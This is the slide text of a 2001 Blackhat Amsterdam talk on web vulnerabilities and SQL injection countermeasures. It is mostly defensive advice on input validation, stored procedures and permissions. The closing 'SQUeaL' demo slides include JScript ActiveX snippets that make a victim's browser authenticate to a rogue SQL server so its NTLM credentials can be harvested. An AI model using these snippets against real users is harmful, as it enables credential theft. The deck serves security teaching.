Welcome to Blackhat Blackhat Security Briefings Amsterdam 2001

Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen Anchor. IS. Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerability and SQL Injection Countermeasures Securing your servers from the most insidious of attacks: The demands of the Global Marketplace have made web development more complex than ever. With customer demands and competitive influences, the functions our applications must be capable of performing constantly push our development into new areas. Even with enterprise firewall solutions, hardened servers, and upto-date web server software in place and properly configured, poor design methodology can leave our systems open for attack. Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Session Overview Part I: ∙ Vulnerabilities Client-side HTML, URL Manipulation, SQL Injection ∙ Countermeasures Input Validation, Data Sanitation, Variable Typing, Procedure Structure, Permissions and ACL’s. Part II: ∙ Live Demos highlighting real-word sites with different issues, participant involvement and brainstorming ∙ SQuea. L Demo (SQuea. L is a NTLM logging rouge SQL server app) Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Part I Vulnerabilites ∙ Client-side HTML ∙ URL Manipulation ∙ SQL Injection Countermeasures ∙ Implementation/Setup ∙ Data Sanitation ∙ Procedure Structure ∙ Input Validation ∙ Variable Typing ∙ Permissions and ACL’s Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Vulnerabilities – Lab Demos Client-side HTML Issues ∙ Web Forms ∙ Input/Select controls ∙ Hidden Fields URL Manipulation ∙ Editing the URL ∙ Session variables ∙ Cookies SQL Injection ∙ The possibilities are endless! Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Countermeasures. Lab Demos Implementation and Setup ∙ ADODB Connection Strings and DSN’s ∙ ODBC Error reporting ∙ Custom error pages Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Countermeasures. Lab Demos Input Validation ∙ Querystring count checking ∙ Data Type Validation ∙ Value/Length Checking ∙ Extents/Boundary Checking ∙ Host submission limits per unit of time Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Countermeasures. Lab Demos Data Sanitation ∙ REPLACE function ∙ Reg. Exp function ∙ Custom functions / explicit declarations Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Countermeasures. Lab Demos Variable Typing ∙ Command object ∙ Parameter declaration ∙ Command type declaration ∙ Execute as methods Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Countermeasures. Lab Demos SQL Stored Procedure Structure ∙ Use stored procedures whenever possible ∙ Type cast variables ∙ Create and use Views as table sources ∙ Avoid “Select *” statements for performance as well as security ∙ sp_execute. SQL procedure for ad hoc queries Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Countermeasures. Lab Demos Permissions and ACL’s. ∙ Open views, but lock down tables ∙ Use groups ∙ lock down xp_cmdshell, xp_sendmail or remove ∙ SQL Service context ∙ Integrated/Mixed security Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerability and SQL Injection Countermeasures Part I Concluded 15 Minute Break Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerability and SQL Injection Countermeasures Welcome Back! Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Part II Live Web Demos and Feedback ∙ Expose potentially insecure implementations of web applications ∙ Discuss potential vulnerabilities and exploits ∙ Mitigation and Prevention SQUea. L Demo: Grabbing NTLM responses from unsuspecting users Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerabilities. Live Demos Real-world web application issues and feedback Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerabilities. Live Demos SQUeal. L: NTLM logging rouge SQL Server ∙ Linux server application based on Dil. Dog’s “Talk. NTLM” code ∙ Waits for TCP/IP connection on 1433, and attempts to authenticate via NTLM ∙ Logs domain, username, and NTLM response Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerabilities. Live Demos SQUea. L: Getting them to connect ∙ ADODB Connection (Lame) conn=new Active. XObject("ADODB. Connection"); conn. Connection. String='Provider=SQLOLEDB. 1; Integrated Security=SSPI; Persist Security Info=False; Initial Catalog=pubs; Data Source=10. 1. 1. 1; Network Library=dbnetlib'; conn. Open(); Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerably and SQL Injection Countermeasures SQUea. L: Getting them to connect ∙ DBNETLIB (Not so lame) {ns = new Active. XObject("SQLNS. SQLNamespace"); ns. Initialize ("Grabber", 2, "Server=10. 1. 1. 1; Trusted_Connection=Yes; Network Library=dbnetlib. dll"); } Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

Web Vulnerability and SQL Injection Countermeasures Closing Remarks Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com

THANK YOU! Additional Resources: http: //www. hammerofgod. com emailto: thor@hammerofgod. com n n n http: //www. securityfocus. com http: //www. sqlsecurity. com http: //heap. nologin. net/aspsec. html http: //security. devx. com/bestdefense/default. asp http: //www. microsoft. com/technet/treeview/default. asp? url=/technet/itsolutions/security/database/data base. asp Blackhat Amsterdam, 2001 Timothy M. Mullen, Anchor. IS. Com; thor@hammerofgod. com